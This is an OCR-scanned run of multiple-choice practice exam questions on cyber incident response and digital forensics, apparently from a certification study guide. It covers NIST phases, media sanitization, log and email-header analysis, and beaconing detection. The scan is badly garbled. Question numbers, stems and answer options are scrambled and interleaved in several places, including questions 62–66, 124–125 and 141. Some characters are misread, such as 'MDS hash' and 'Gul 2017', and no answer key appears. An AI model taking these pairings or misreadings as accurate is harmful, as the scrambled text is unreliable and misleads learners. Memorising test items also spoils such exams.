An internal system is transferring a large volume of data. 
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The network link has been restored. 
61. Which of the following commands is not useful for determining the list of network 
interfaces on a Linux system? 
A. ifconfig 
B. netstat -i 
C. ip link show 
D. intf -q 


62. What Windows memory protection methodology is shown here? 


First boot Second boot 





63. 


64. 


65. 


66. 
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A. DEP 

B. ASLR 

C. StackProtect 
D. MemShuffle 


Forensic investigation shows that the target of the investigation used the Windows Quick 
Format command to attempt to destroy evidence on a USB thumb drive. Which of the 
NIST sanitization techniques has the target of the investigation used in their attempt to 
conceal evidence? 


A. Clear 
B. Purge 
C. Destroy 


D. None of the above 


Angela wants to use her network security device to detect potential beaconing behavior. 
Which of the following options is best suited to detecting beaconing using her network 
security device? 


A. Antivirus definitions 

B. File reputation 

C. IP reputation 

D. Static file analysis 

During an incident response process Susan plugs a system back into the network, 


allowing it normal network access. What phase of the incident response process is Susan 
performing? 


A. Preparation 

B. Detection and analysis 

C. Containment, eradication, and recovery 

D. Post-incident activity 

A server in the data center that Chris is responsible for monitoring unexpectedly connects 


to an off-site IP address and transfers 9GB of data to the remote system. What type of 
monitoring should Chris enable to best assist him in detecting future events of this type? 


A. Flow logs with heuristic analysis 

B. SNMP monitoring with heuristic analysis 
C. Flow logs with signature based detection 
D 


SNMP monitoring with signature-based detection 
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67. Jennifer’s team has completed the initial phases of their incident response process and is 
assessing the time required to recover from the incident. Using the NIST recoverability 
effort categories, the team has determined that they can predict the time to recover but 
will require additional resources. How should she categorize this using the NIST model? 


A. Regular 
B. Supplemented 
C. Extended 


D. Not recoverable 
68. Which of the following mobile device forensic techniques is not a valid method of isolation 
during forensic examination? 
A. Use a forensic SIM. 
B. Buy and use a forensic isolation appliance. 
C. Place the device in an antistatic bag. 
D. Put the device in airplane mode. 


69. Rick wants to monitor permissions and ownership changes of critical files on the Red Hat 
Linux system he is responsible for. What Linux tool can he use to do this? 


A. watchdog 
B. auditctl 
C. dirwatch 


D. monitord 


70. Janet is attempting to conceal her actions on a company-owned computer. As part of her 
cleanup attempts, she deletes all of the files she downloaded from a corporate file server 
using a browser in incognito mode. How can a forensic investigator determine what files 
she downloaded? 


A. Network flows 
B. SMB logs 
C. Browser cache 
D. Drive analysis 
71. Joe is aware that an attacker has compromised a system on his network but wants to 
continue to observe the attacker’s efforts as they continue their attack. If Joe wants to 


prevent additional impact on his network while watching what the attacker does, what 
containment method should he use? 


A. Removal 

B. Isolation 

C. Segmentation 
D. 


Detection 


72. 


73. 


74. 


75. 


76. 
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When Charles arrived at work this morning, he found an email in his inbox that read, 
“Your systems are weak; we will own your network by the end of the week.” How 
would he categorize this sign of a potential incident if he was using the NIST SP 800-61 
descriptions of incident signs? 


A. An indicator 

B. A threat 

C. Arisk 

D. A precursor 

During an incident response process, Cynthia conducts a lessons-learned review. What 
phase of the incident response process is she in? 

A. Preparation 

B. Detection and analysis 

C. Containment, eradication, and recovery 

D. Post-incident recovery 

As part of his incident response program, Allan is designing a playbook for zero-day 
threats. Which of the following should not be in his plan to handle them? 

A. Segmentation 

B. Patching 

C. Using threat intelligence 

D. Whitelisting 


As the CISO of her organization, Jennifer is working on an incident classification scheme 
and wants to base her design on NIST’s definitions. Which of the following options should 
she use to best describe a user accessing a file that they are not authorized to view? 


A. An incident 

B. Anevent 

C. An adverse event 

D. A security incident 

Fred wants to identify digital evidence that can place an individual in a specific place at a 


specific time. Which of the following types of digital forensic data is not commonly used 
to attempt to document physical location at specific times? 


A. Cell phone GPS logs 

B. Photograph metadata 
C. Cell phone tower logs 
D 


Microsoft Office document metadata 
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Cynthia has completed the validation process of her media sanitization efforts and has 
checked a sample of the drives she had purged using a built-in cryptographic wipe utility. 
What is her next step? 


A. Resample to validate her testing. 

B. Destroy the drives. 

C. Documentation 

D. She is done and can send the drives on for disposition. 

In his role as a small company’s information security manager, Mike has a limited budget 
for hiring permanent staff. While his team can handle simple virus infections, he does 
not currently have a way to handle significant information security incidents. Which of 


the following options should Mike investigate to ensure that his company is prepared for 
security incidents? 


A. Outsource to a third-party SOC. 

B. Create an internal SOC. 

C. Hire an internal incident response team. 

D. Outsource to an incident response provider. 

The Stuxnet attack relied on engineers who transported malware with them, crossing 


the air gap between networks. What type of threat is most likely to cross an air-gapped 
network? 


A. Email 

B. Web 

C. Removable media 

D. Attrition 

While reviewing his network for rogue devices, Dan notes that a system with MAC 
address D4:BE:D9:ES:F9:18 has been connected to a switch in one of the offices in his 


building for three days. What information can this provide Dan that may be helpful if he 
conducts a physical survey of the office? 


A. The operating system of the device 

B. The user of the system 

C. The vendor who built the system 

D. The type of device that is connected 

Frank wants to ensure that media has been properly sanitized. Which of the following 
options properly lists sanitization descriptions from least to most effective? 

A. Purge, clear, destroy 

B. Eliminate, eradicate, destroy 

C. Clear, purge, destroy 
D 


Eradicate, eliminate, destroy 
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82. Degaussing is an example of what form of media sanitization? 
A. Clearing 
B. Purging 
C. Destruction 
D. It is not a form of media sanitization. 


83. While reviewing storage usage on a Windows system, Brian checks the volume shadow 
copy storage as shown here: 


C: \WINDOWS\system32>vssadmin list Shadowstorage 
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool 
(C) Copyright 2001-2013 Microsoft Corp. 
Shadow Copy Storage association 
For volume: (C:)\\?\Volume{c3b53dae-0e54-13e3-97ab-806e6f6e69633} \ 


Shadow Copy Storage volume: (C:)\\?\Volume{c3b53dae-0e54-13e3-97ab- 
806e6f6e6963 } \ 


Used Shadow Copy Storage space: 25.6 GB (2% 
Allocated Shadow Copy Storage space: 26.0 GB (2%) 
Maximum Shadow Copy Storage space: 89.4 GB (10%) 


What purpose does this storage serve, and can he safely delete it? 
A. It provides a block-level snapshot and can be safely deleted. 
B. It provides secure hidden storage and can be safely deleted. 
C. It provides secure hidden storage and cannot be safely deleted. 
D. It provides a block-level snapshot and cannot be safely deleted. 
84. Near the end of a typical business day, Danielle is notified that her organization’s email 


servers have been blacklisted because of email that appears to originate from her domain. 
What information does she need to start investigating the source of the spam emails? 


A. Firewall logs showing SMTP connections 
B. The SMTP audit log from her email server 
C. The full headers of one of the spam messages 
D. Network flows for her network 
85. Lauren recovers a number of 16GB and 32GB microSD cards during a forensic 


investigation. Without checking them manually, what filesystem type is she most likely to 
find them formatted in as if they were used with a digital camera? 


A. RAW 
B. FAT16 
C. FAT32 
D. HFS+ 
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While checking for bandwidth consumption issues, Alex uses the ifconfig command on 
the Linux box that he is reviewing. He sees that the device has sent less than 4Gb of data, 
but his network flow logs show that the system has sent over 20Gb. What problem has 
Alex encountered? 


A. A rootkit is concealing traffic from the Linux kernel. 

B. Flow logs show traffic that does not reach the system. 

C. ifconfig resets traffic counters at 4Gb. 

D. ifconfig only samples outbound traffic and will not provide accurate information. 
After arriving at an investigation site, Brian determines that three powered-on computers 


need to be taken for forensic examination. What steps should he take before removing 
the PCs? 


A. Power them down, take pictures of how each is connected, and log each system in as 
evidence. 


B. Take photos of each system, power them down, and attach a tamper-evident seal to 
each PC. 


C. Collect live forensic information, take photos of each system, and power them down. 

D. Collect a static drive image, validate the hash of the image, and securely transport 
each system. 

In his role as a forensic examiner, Lucas has been asked to produce forensic evidence 

related to a civil case. What is this process called? 

A. Criminal forensics 

B. E-discovery 

C. Cyber production 

D. Civil tort 

During their organization’s incident response preparation, Charles and Linda are 

identifying critical information assets that the company uses. Included in their 


organizational data sets is a list of customer names, addresses, phone numbers, and 
demographic information. How should Charles and Linda classify this information? 


A. PII 

B. Intellectual property 

C. PHI 

D. PCI-DSS 

As Lauren studies her company’s computer forensics playbook, she notices that forensic 


investigators are required to use a chain of custody form. What information would she 
record on that form if she was conducting a forensic investigation? 


A. The list of individuals who made contact with files leading to the investigation 
B. The list of former owners or operators of the PC involved in the investigation 

C. All individuals who work with evidence in the investigation 
D 


The police officers who take possession of the evidence 


91. 


92. 


93. 


94. 


95. 
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Scott needs to ensure that the system he just rebuilt after an incident is secure. Which type 
of scan will provide him with the most useful information to meet his goal? 


A. An authenticated vulnerability scan from a trusted internal network 
B. An unauthenticated vulnerability scan from a trusted internal network 
C. An authenticated scan from an untrusted external network 


D. An unauthenticated scan from an untrusted external network 


What is the primary role of management in the incident response process? 
A. Leading the CSIRT 

B. Acting as the primary interface with law enforcement 

C. Providing authority and resources 


D. Assessing impact on stakeholders 


While reviewing his OSSEC SIEM logs, Chris notices the following entries. What should 
his next action be if he wants to quickly identify the new user’s creation date and time? 


1 22:45:35 [OSSEC] New group added to the system 5901 


1 22:45:35 [OSSEC] New user added to the system 5902 


Check the user. log for a new user. 


Check syslog for a new user. 


A. 
B. 
C. 


Check /etc/passwd for a new user. 
D. Check auth. log for a new user. 
Jessica wants to track the changes made to the registry and filesystem while running a 


suspect executable on a Windows system. Which Sysinternals tool will allow her to do 
this? 


A. App Monitor 

B. Resource Tracker 

C. Process Monitor 

D. There is not a Sysinternals tool with this capability. 

Frank wants to improve the effectiveness of the incident analysis process he is responsible 


for as the leader of his organization’s CSIRT. Which of the following is not a commonly 
recommended best practice based on NIST’s guidelines? 


A. Profile networks and systems to measure the characteristics of expected activity. 
B. Perform event correlation to combine information from multiple sources. 

C. Maintain backups of every system and device. 
D 


Capture network traffic as soon as an incident is suspected. 
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96. NIST describes four major phases in the incident response cycle. Which of the following is 
not one of the four? 


A. Containment, eradication, and recovery 
B. Notification and communication 
C. Detection and analysis 
D. Preparation 
97. Charles wants to perform memory forensics on a Windows system and wants to access 


pagefile.sys. When he attempts to copy it, he receives the following error. What access 
method is required to access the page file? 


The action can't be completed because the file is open in another program 


Close the file and try again. 


pagefile.sys 
Date created: 8/26/2013 12:08 PM 
Size: 16.0 GB 


Try Again 


More details 





Run Windows Explorer as an administrator and repeat the copy. 
Open the file using fmem. 


Run cmd.exe as an administrator and repeat the copy. 
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Shut the system down, remove the drive, and copy it from another system. 


98. Chris wants to prevent evil twin attacks from working on his wireless network. Which of 
the following is not a useful method for detecting evil twins? 


A. Check for BSSID. 
B. Check the SSID. 
C. Check the attributes (channel, cipher, authentication method). 


D. Check for tagged parameters like the organizational unique identifier. 


99. Where is slack space found in the following Windows partition map? 


System Reserved 


"i 100 MB NTFS 893.71 GB NTFS 
Online Healthy (System, Acti || Healthy (Boot, Page File, Crash Dump, Primary Partition) Unallocated 


A. 
B. 
C. 
D. 





The System Reserved partition 
The System Reserved and Unallocated partitions 
The System Reserved and C: partitions 


The C: and unallocated partitions 


100. 


101. 


102. 


103. 


104. 
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Luke needs to verify settings on a macOS computer to ensure that the configuration items 
he expects are set properly. What type of file is commonly used to store configuration set- 
tings for macOS systems? 


A. The registry 

B. .profile files 

C. Plists 

D. .config files 

Adam needs to determine the proper retention policy for his organization’s incident data. 


If he wants to follow common industry practices and does not have specific legal or con- 
tractual obligations that he needs to meet, what time frame should he select? 


A. 30 days 

B. 90 days 

C. 1to2 years 

D. 7 years 

The system that Alice has identified as the source of beaconing traffic is one of her organi- 
zation’s critical e-commerce servers. To maintain her organization’s operations, she needs 


to quickly restore the server to its original, uncompromised state. What criteria is most 
likely to be impacted the most by this action? 


A. Damage to the system or service 

B. Service availability 

C. Ability to preserve evidence 

D. Time and resources needed to implement the strategy 

After law enforcement was called because of potential criminal activity discovered as part 


of a forensic investigation, the officers on the scene seized three servers. When can Joe 
expect his servers to be returned? 


A. After 30 days, which provides enough time for a reasonable imaging process. 

B. After 6 months, as required by law. 

C. After 1 year, as most cases resolve in that amount of time. 

D. Joe should not plan on a time frame for return. 

Lauren wants to create a forensic image that third-party investigators can use but does not 
know what tool the third-party investigation team that her company intends to engage will 


use. Which of the following forensic formats should she choose if she wants almost any 
forensic tool to be able to access the image? 


A. E01 
B. AFF 
Cc. RAW 
D. AD1 
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After Janet’s attempts to conceal her downloads of important corporate information were 
discovered, forensic investigators learned that she frequently copied work files to a USB 
drive. Which of the following is not a possible way to manually check her Windows work- 
station for a list of previously connected USB drives? 


A. Check the security audit logs. 

B. Check the setupapi log file. 

C. Search the registry. 

D. Check the user’s profile. 

As part of his forensic investigation, Scott intends to make a forensic image of a network 


share that is mounted by the PC that is the focus of his investigation. What information 
will he be unable to capture? 


A. File creation dates 

B. Deleted files 

C. File permission data 

D. File metadata 

NIST SP 800-61 identifies six outside parties that an incident response team will typically 
communicate with. Which of the following is not one of those parties? 

A. Customers, constituents, and media 

B. Internet service providers 

C. Law enforcement agencies 

D. Legal counsel 

What common incident response follow-up activity includes asking questions like “What 
additional tools or resources are needed to detect or analyze future events?” 

A. Preparation 

B. Lessons-learned review 

C. Evidence gathering 

D. Procedural analysis 

Susan has been asked to capture forensic data from a Windows PC and needs to ensure 


that she captures the data in their order of volatility. Which order is correct from most 
volatile to least volatile? 


A. Network traffic, CPU cache, disk drives, optical media 

B. CPU cache, network traffic, disk drives, optical media 

C. Optical media, disk drives, network traffic, CPU cache 

D. Network traffic, CPU cache, optical media, disk drives 

During an incident response process, Susan heads to a compromised system and pulls its 
network cable. What phase of the incident response process is Susan performing? 

A. Preparation 


B. Detection and analysis 
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C. Containment, eradication, and recovery 

D. Post-incident activity 

Scott needs to verify that the forensic image he has created is an exact duplicate of the 
original drive. Which of the following methods is considered forensically sound? 

A. Create a MDS hash 

B. Create a SHA-1 hash 

C. Create a SHA-2 hash 

D. All of the above 


What strategy does NIST suggest for identifying attackers during an incident response 
process? 


A. Use geographic IP tracking to identify the attacker’s location. 

B. Contact upstream ISPs for assistance in tracking down the attacker. 

C. Contact local law enforcement so that they can use law enforcement-specific tools. 
D. Identifying attackers is not an important part of the incident response process. 

Rick is conducting a forensic investigation of a compromised system. He knows from user 


reports that issues started at approximately 3:30 p.m. on June 12. Using the SANS SIFT 
open source forensic tool, what process should he use to determine what occurred? 


A. Search the drive for all files that were changed between 3 and 4 p.m. 
B. Create a Super Timeline. 


C. Run anti-malware and search for newly installed malware tools during that time 
frame. 


D. Search system logs for events between 3 and 4 p.m. 
Charles believes that an attacker may have added accounts and attempted to obtain extra 


rights on a Linux workstation. Which of the following is not a common way to check for 
unexpected accounts like this? 


A. Review /etc/passwd and /etc/shadow for unexpected accounts. 

B. Check /home/ for new user directories. 

C. Review /etc/sudoers for unexpected accounts. 

D. Check /etc/groups for group membership issues. 

Ben wants to coordinate with other organizations in the information security community 


to share data and current events as well as warnings of new security issues. What type of 
organization should he join? 


A. AnISAC 
B. A CSIRT 
C. A VPAC 
D. AnIRT 


168 Chapter 3 = Domain 3: Cyber Incident Response 


116. While investigating a spam email, Adam is able to capture headers from one of the email 
messages that was received. He notes that the sender was Carmen Victoria Garci. What 
facts can he gather from the headers shown here? 


ARC-Authentication-Results: i=1; mx.google.com; 
spf=pass (google.com: domain of www.@coral.ocn.ne.jp designates 153.149.233.2 as permitted sender) smtp.mailfrom=www.@coral.ocn.ne.jp 

Return-Path: <www.@coral.ocn.ne.jp> 

Received: from mbkd020i.ocn.ad.jp (mbkd020i.ocn.ad.jp. [153.149.233.2}) 
by mx.google.com with ESMTP id di3sil5760624pin.176.2017.07.04 
Tue, 04 Gul 2017 09:39:20 -0700 (PDT) 

Received-SPF: pass (google.com: domain of www.@coral.ocn.n 


rh ae ne 
09.39.08; 


A 


-jp designates 153.149.233.2 as permitted sender) client-ip=153.149.233.2; 


Authentication-Results: mx. google.com; 
spf=pass (google.com: domain of www.@coral.ocn.ne.jp designates 153.149.233.2 as permitted sender) smtp.mailfrom=www.@coral.ocn.ne.jp 
Received: from mf-smf-ucb0li.ocn.ad.jp (mf-smf-ucb0ll.ocn.ad.jp [153.149.228.228]) by mbkd0201.ocn.ad.jp (Postfix) with ESMTP id DEE6B300D37; Wed, 
5 Jul 2017 01:38:39 +0900 (JST) 
Received: from mf-smf-ucb0li.ocn.ad.jp (mf-smf-ucb0ii [153.149.228.228]) by mf-smf-ucb0ii.ccn.ad.jp (Postfix) with ESMTP id Ci6C&90022E; Wed, 
S5 Jul 2017 01:38:39 +0900 (JST) 
Received: from ntt.pod0l.mv-mta-ucb019 (mv-mta-ucb019.ocn.ad.jp [153.149.142.82]) by mf-smf-ucb0ll.ocn.ad.jp (Switch-3.3.4/Switch-3.3. 4) 
with ESMTP id v64GcHjL065317; Wed, 5 Jul 2017 01:38:35 +0900 
Received: from vcwebmail.ocn.ad.jp ([{153.149.227.133]) by ntt.pod0i.mv-mta-ucbh019 with id ggebivO0l2tKTyHOigebsV; Tue, 04 Jul 2017 16:38:35 +0000 
2 


Received: from mzcstore24l.ocn.ad.jp (mz-fcb24ip.ocn.ad.jp [180.8.112.196)]) by vcwebmail.ocn.ad.jp (Postfix) with ESMTP; Wed, 
S Jul 2017 01:38:35 +0900 (JST) 

Date: Wed, 5 Jul 2017 01:38:35 +0900 (JST) 

From: Carmen Victoria Garci <"www."@coral.ocn.ne.jp> 

Reply-To: Carmen Victoria Garci <tntexpress8i9@yahoo.com> 

Message-ID: <2041845944.77592137 .1499186315187. JavaMail.root@coral.ocn.ne.jp> 

Subject: ATTENTION;THE OWNER OF THIS EMAIL, 

MIME-Version: 1.0 

Content-Type: text/plain; charset=IS0-2022-JP 

Content-Transfer-Encoding: 7bit 

X-Originating-IP: [(197.234.219.24) 


Victoria Garci’s email address is tntexpress819@yahoo. com. 
The sender sent via Yahoo. 


The sender sent via a system in Japan. 
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The sender sent via Gmail. 


117. Lauren needs to access a macOS system but does not have the user’s password. If the sys- 
tem is not FileVaulted, which of the following options is not a valid recovery method? 


A. Use Single User mode to reset the password. 
B. Use Recovery mode to recover the password. 
C. Use Target Disk mode to delete the Keychain. 


D. Reset the password from another privileged user account. 


118. While performing forensic analysis of an iPhone backup, Cynthia discovers that she has 
only some of the information that she expects the phone to contain. What is the most 
likely scenario that would result in the backup she is using having partial information? 


A. The backup was interrupted. 

B. The backup is encrypted. 

C. The backup is a differential backup. 
D. The backup is stored in iCloud. 


119. Chris wants to ensure that his chain of custody documentation will stand up to examina- 
tion in court. Which of the following options will provide him with the best documentary 
proof of his actions? 


A. A second examiner acting as a witness and countersigning all actions 
B. A complete forensic log book signed and sealed by a notary public 

C. A documented forensic process with required sign-off 
D 


Taking pictures of all independent forensic actions 


Chapter 3 = Domain 3: Cyber Incident Response 169 


120. Cynthia is reviewing her organization’s incident response recovery process, which is out- 
lined here. Which of the following recommendations should she make to ensure that fur- 
ther issues do not occur during the restoration process? 





Change passwords before restoring from backup. 
Isolate the system before restoring from backups. 


Securely wipe the drive before restoration. 
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Vulnerability scan before patching. 


121. After zero wiping a system’s hard drive and rebuilding it with all security patches and 
trusted accounts, Lauren is notified that the system is once again showing signs of compro- 
mise. Which of the following types of malware package cannot survive this type of eradi- 
cation effort? 


A. An MBR-resident malware tool 
B. A UEFI-resident malware 
C. A BIOS-resident malware 


D. A slack space-resident malware package 


122. Patents, copyrights, trademarks, and trade secrets are all related to what type of data? 
A. PII 
B. PHI 
C. Corporate confidential 


D. Intellectual property 


123. Which of the following issues is not commonly associated with BYOD devices? 
A. Increased network utilization 
B. Increased device costs 
C. Increased support tickets 


D. Increased security risk 
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124. Saria is reviewing the contents of a drive as part of a forensic effort and notes that the file 
she is reviewing takes up more space on the disk than its actual size, as shown here. What 


125. 
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has she discovered? 


99 9 > 


What is the minimum retention period for incident data for U.S. federal government 


txt Properties 


General Details Acronis Recovery 


Size on disk: 


Slack space 
Hidden content 
Sparse files 


Encryption overhead 


agencies? 

A. 90 days 
B. 1 year 
C. 3 years 
D. 7 years 





[example2.be 





Text Document (txt) 
[E] Notepad 

EN 

161 KB (164,912 bytes) 


168 KB (172,032 bytes) 


Today, July 03, 2017, 1 minute ago 
Today, July 03, 2017, 1 minute ago 
Today, July 03, 2017 


[C] Read-only [_] Hidden 
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Kathleen is restoring a critical business system to operation after a major compromise and 
needs to validate that the operating system and application files are legitimate and do not 
have any malicious code included in them. What type of tool should she use to validate this? 


A. A trusted system binary kit 

B. Dynamic code analysis 

C. Static code analysis 

D. File rainbow tables 

Charles wants to verify that authentication to a Linux service has two-factor authentica- 


tion settings set as a requirement. Which common Linux directory can he check for this 
type of setting, listed by application, if the application supports it? 


A. /etc/pam.d 

B. /etc/passwd 

C. /etc/auth.d 

D. /etc/tfa 

Charles is creating the evidence log for a computer that was part of an attack on an exter- 


nal third-party system. What network-related information should he include in that log if 
he wants to follow NIST’s recommendations? 


A. Subnet mask, DHCP server, hostname, MAC address 

B. IP addresses, MAC addresses, host name 

C. Domain, hostname, MAC addresses, IP addresses 

D. NIC manufacturer, MAC addresses, IP addresses, DHCP configuration 


Chris believes that systems on his network have been compromised by an advanced persis- 
tent threat actor. He has observed a number of large file transfers outbound to remote sites 
via TLS-protected HTTP sessions from systems that do not typically send data to those 
locations. Which of the following techniques is most likely to detect the APT infections? 


A. Network traffic analysis 

B. Network forensics 

C. Endpoint behavior analysis 
D 


Endpoint forensics 
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130. After submitting a suspected malware package to VirusTotal, Alex receives the following 
results. What does this tell Alex? 


pa 


& Analysis 


SHA256: 


total 


027cc450ef5f8c5f65332964 1 ec 1fed9 1f694e0d229928963b30f6b0d7d3a745 


File name: 027cc450ef5f8c5f653329641ec 1fed9. exe 


Detection ratio: 55/62 


Analysis date: 2017-07-05 15:10:30 UTC ( 54 minutes ago ) 


Antivirus 


Ad-Aware 


AegisLab 


AhnLab-V3 


ALYac 


Antiy-AVL 


Arcabit 


Avast 


131. 





Q File detail % Relationships © Additional information @ Comments QU ©) Votes 


Result Update 

Trojan.Ransom.GoldenEye.B 20170705 
Troj.Ransom.W32!c 20170705 
Trojan/Win32.Petya.R203323 20170705 


Trojan.Ransom.Petya 20170705 


Trojan/Win32.SGeneric 20170705 


Trojan.Ransom.GoldenEye.B 20170705 


MBR:Ransom-C [Trj] 20170705 


[https://drive.google.com/open?id=0B4u5n3PsqCBj cXNOVmtROEZFUFE | 


A. 
B. 
C. 
D. 


The submitted file contains more than one malware package. 
Antivirus vendors use different names for the same malware. 
VirusTotal was unable to specifically identify the malware. 


The malware package is polymorphic, and matches will be incorrect. 


Ben is investigating a potential malware infection of a laptop belonging to a senior man- 
ager in the company he works for. When the manager opens a document, website, or other 
application that takes user input, words start to appear as though they are being typed. 
What is the first step that Ben should take in his investigation? 


A. 


B. 
C. 
D 


Run an antivirus scan. 

Disconnect the system from the network. 
Wipe the system and reinstall. 

Observe and record what is being typed. 


132. 


133. 


134. 


135. 


Chapter 3 = Domain 3: Cyber Incident Response 173 


Kathleen’s forensic analysis of a laptop that is believed to have been used to access sensitive 
corporate data shows that the suspect tried to overwrite the data they downloaded as part 
of antiforensic activities by deleting the original files and then copying other files to the 
drive. Where is Kathleen most likely to find evidence of the original files? 


A. The MBR 

B. Unallocated space 
C. Slack space 

D. The FAT 


As part of a test of her network’s monitoring infrastructure, Kelly uses snmpwalk to 
validate her router SNMP settings. She executes snmpwalk as shown here: 


snmpwalk -c public 10.1.10.1 -v1 

180.3.6.1.2.1.1.0 = STRING: "RouterOS 3.6" 
180.3.6.1.2.1.2.0 = OID: 180.3.6.1.4.1.30800 
180.3.6.1.2.1.1.3.0 = Timeticks: (1927523) 08:09:11 
180.3.6.1.2.1.1.4.0 = STRING: "root" 
180.3.6.1.2.1.1.5.0 = STRING: "RouterOS" 


Which of the following pieces of information is not something she can discover from 
this query? 


A. SNMP v1 is enabled. 

B. The community string is public. 

C. The community string is root. 

D. The contact name is root. 

Laura needs to check on memory, CPU, disk, network, and power usage on a Mac. What 
GUI tool can she use to check these? 

A. Resource Monitor 

B. System Monitor 

C. Activity Monitor 

D. Sysradar 

Angela wants to access the decryption key for a BitLocker-encrypted system, but the sys- 


tem is currently turned off. Which of the following methods is a viable method if a Win- 
dows system is turned off? 


A. Hibernation file analysis 
B. Memory analysis 

C. Boot-sector analysis 
D 


Brute-force cracking 
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136. Adam believes that a system on his network is infected but does not know which system. 
To detect it, he creates a query for his network monitoring software based on the follow- 
ing pseudocode. What type of traffic is he most likely trying to detect? 


destip: [*] and duration < 10 packets and destbytes < 3000 and 
flowcompleted = true 


and application = http or https or tcp or unknown and content != 
uripath:* and content 


l= contentencoding:* 


A. Users browsing malicious sites 
B. Adware 
C. Beaconing 
D. Outbound port scanning 
137. Casey’s search for a possible Linux backdoor account during a forensic investigation has 


led her to check through the filesystem for issues. Where should she look for back doors 
associated with services? 


A. /etc/passwd 
B. /etc/xinetd. conf 
C. /etc/shadow 
D. SHOME/.ssh/ 


138. As an employee of the U.S. government, Megan is required to use NIST’s information 
impact categories to classify security incidents. During a recent incident, proprietary infor- 
mation was changed. How should she classify this incident? 


A. Asa privacy breach 

B. Asan integrity loss 

C. Asa proprietary breach 
D. Asan availability breach 


139. During what stage of an event is preservation of evidence typically handled? 
A. Preparation 
B. Detection and analysis 
C. Containment, eradication, and recovery 
D. Post-incident activity 
140. Susan is reviewing event logs to determine who has accessed a workstation after business 


hours. When she runs secpol.msc on the Windows system she is reviewing, she sees the 
following settings. What important information will be missing from her logs? 


3 Local Security Policy 
File Action View Help 
e| aml] 


> D Security Options 
v ©) Windows Firewall with Advanced £ 
v É Windows Firewall with Advanc 
3 Inbound Rules 
3 Outbound Rules 
Ba; Connection Security Rules 
(5) Network List Manager Policies 
> (5) Public Key Policies 
> (5) Software Restriction Policies 
v [Ñ Application Control Policies 
> r| AppLocker 
> & IP Security Policies on Local Come 
v [Ñ Advanced Audit Policy Configurat 
v IÑ System Audit Policies - Local C 
JÄ Account Logon 
Ẹ Account Management 
5 Detailed Tracking 
E DS Access 
& Logon/Logoff 
5 Object Access 
E Policy Change 
E Privilege Use 
EH System 
E Global Object Access Audit 
> 


VY VY VY VY VY VY WYO WY YY vw 


Login failures 
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A 


v 


Successful logins 


Times from logins 
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Subcategory 

FÌ Audit Credential Validation 

sis] Audit Kerberos Authentication Service 
sis] Audit Kerberos Service Ticket Operations 
sio] Audit Other Account Logon Events 


User IDs from logins 


Audit Events 


Failure 

Not Configured 
Not Configured 
Not Configured 
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141. Cynthia runs the command shown here while checking usage of her Linux system. Which 
of the following statements is true based on the information shown? 


[userl@demo~]$ netstat -at 


Active Internet connections (servers and established) 
Proto Recv-Q Send-Q Local Address 


tcp 
tcp 
tcp 
tcp 
tcp 
tcp 
tcp 
tcp 
tcp 
tcp 
tcp 
tcp 
tcp 
tcp 
tcp 
tcp 


GBOQ@QOdodO0O000000000 
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There are two users logged in remotely via ssh. 


The system is not providing any UDP services. 


Foreign Address State 
© localhost :32000 =o" LISTEN 
© demo.example.com:5666 woa LISTEN 
O *:54090 = * LISTEN 
O *:sunrpc = LISTEN 
0 *:ssh > LISTEN 
© localhost :smtp kek LISTEN 
O localhost :6011 = LISTEN 
O demo.example.com:ssh ruser.demo.com: 44498 ESTABLISHED 
O demo.example.com:ssh remote.test.org:51812 ESTABLISHED 
© localhost :32000 localhost :31000 ESTABLISHED 
O *:monkeycom == LISTEN 
O *:60719 wek LISTEN 
0 *:sunrpc wok LISTEN 
O *:ssh wow LISTEN 
© localhost :6011 re LISTEN 
© localhost :31000 localhost : 32000 ESTABLISHED 


There is an active exploit in progress using the Monkeycom exploit. 


The local system is part of the demo.com domain. 
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Lucas wants to purge a drive to ensure that data cannot be extracted from it when it is sent 
off-site. Which of the following is not a valid option for purging hard drives on a Windows 
system? 


A. Use the built-in Windows sdelete command line. 

B. Use Eraser. 

C. Use DBAN. 

D. Encrypt the drive and then delete the key. 

The company that Charleen works for has been preparing for a merger, and during a quiet 
phase she discovers that the corporate secure file server that contained the details of the 


merger has been compromised. As she works on her report, how should she most accu- 
rately categorize the data that was breached? 


A. PII 
B. PHI 
C. Intellectual property 


D. Corporate confidential data 


Which of the following is not a valid use case for live forensic imaging? 

A. Malware analysis 

B. Encrypted drives 

C. Postmortem forensics 

D. Nonsupported filesystems 

Which of the following commands is the standard way to determine how old a user account 
is on a Linux system if [username] is replaced by the user ID that you are checking? 
A. userstat [username] 

B. ls -ld /home/[username ] 

C. aureport -auth | grep [username] 

D. None of the above 


Profiling networks and systems can help to identify unexpected activity. What type of 
detection can be used once a profile has been created? 


A. Dynamic analysis 

B. Anomaly analysis 

C. Static analysis 

D. Behavioral analysis 

While reviewing the actions taken during an incident response process, Jennifer is 
informed by the local desktop support staff person that the infected machine was returned 


to service by using a Windows system restore point. Which of the following items will a 
Windows system restore return to a previous state? 


A. Personal files 

B. Malware 

C. Windows system files 
D. All installed apps 
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148. During a major incident response effort, Ben discovers evidence that a critical applica- 


149. 


150. 


151. 


tion server may have been the data repository and egress point in the compromise he is 
investigating. If he is unable to take the system offline, which of the following options will 
provide him with the best forensic data? 


A. Reboot the server and mount the system drive using a USB-bootable forensic suite. 
B. Create an image using a tool like FTK Imager Lite. 
C. Capture the system memory using a tool like Volatility. 


D. Install and run an imaging tool on the live server. 


Charles wants to monitor file permission changes on a Windows system he is responsible 
for. What audit category should he enable to allow this? 


A. File Permissions 
B. User Rights 

C. Filesystem 

D. Audit Objects 


Charles finds the following entries on a Linux system in /var/log/auth. log. If he is the 
only user with root privileges, requires two-factor authentication to log in as root, and did 
not take the actions shown, what should he check for? 


Jun 20 21:44:02 kali useradd[1433]: new group: name=demo, GID=1000 

Jun 20 21:44:02 kali useradd[1433]: new user: name=demo, UID=1000, GID=1000, home=/home/demo, shell=/bin/sh 

Jun 20 21:44:11 kali passwd[1438]: pam_unix(passwd:chauthtok): password changed for demo 

Jun 20 21:44:11 kali passwd[1438]: gkr-pam: couldn't update the login keyring password: no old password was entered 
Jun 20 21:44:14 kali su[1439]: Successful su for demo by root 

Jun 20 21:44:14 kali su[1439]: + /dev/pts/1 root:demo 

Jun 20 21:44:14 kali su[1439]: pam unix(su:session): session opened for user demo by (uid=0) 

Jun 20 21:44:14 kali su[1439]: pam systemd(su:session): Cannot create session: Already occupied by a session 

Jun 20 21:44:24 kali sudo: demo : user NOT in sudoers ; TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/bin/su 
